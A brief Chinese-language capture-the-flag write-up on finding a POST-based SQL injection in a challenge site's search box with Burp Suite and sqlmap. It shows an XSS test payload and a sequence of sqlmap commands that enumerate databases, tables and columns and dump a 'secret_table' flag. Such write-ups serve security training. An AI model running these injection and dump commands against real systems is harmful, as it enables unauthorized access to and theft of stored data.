bp的使用
sqlmap的post注入
分析:
首先打开目标网址,发现有个搜索框,于是猜测是否存在sql注入或者xss
sql注入测试:搜索框中随便输入一个1
url栏没有请求参数,无论怎么测试页面都没有返回值
xss测试:页面也是没有返回值,并且根据源码可以看出,js代码是没有被过滤的,但却利用失败,所以这里就不存在xss漏洞
<script>alert(1)</script>
sqlmap自动化注入
参数 文本文件
-r REQUESTFILE Load HTTP request from a file
sqlmap -r xctfrequest.txt --dbs
sqlmap -r xctfrequest.txt -D news --tables
sqlmap -r xctfrequest.txt -D news -T secret_table --columns
sqlmap -r xctfrequest.txt -D news -T secret_table -C "id,fl4g" --dump
sqlmap -r xctfrequest.txt -D news --dump